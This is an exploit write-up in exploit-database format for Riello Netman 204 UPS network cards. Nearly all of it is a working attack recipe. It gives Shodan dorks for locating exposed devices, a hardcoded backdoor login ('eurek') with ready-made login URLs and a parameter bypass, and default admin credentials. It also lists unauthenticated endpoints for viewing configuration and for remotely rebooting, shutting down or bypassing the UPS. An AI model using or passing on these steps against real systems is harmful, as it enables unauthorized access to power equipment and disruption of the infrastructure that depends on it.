# Exploit Title: Netman 204 - Broken Access Control Remote command
# Date: 1/28/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux
Step 1 : Attacker can using these dorks then can find the UPS panel .
Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin
# We Found Two panel Yellow and blue
Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups .
Yellow Panel : username and password : eurek
Some exploits for that :
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
Blue Panel : username and password : admin
Some Critical leaks without authentication we can see :
http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html
#With using up paths we can see the details of the UPS without authentication .
First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :)
Some Remote commands without authentication :
http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery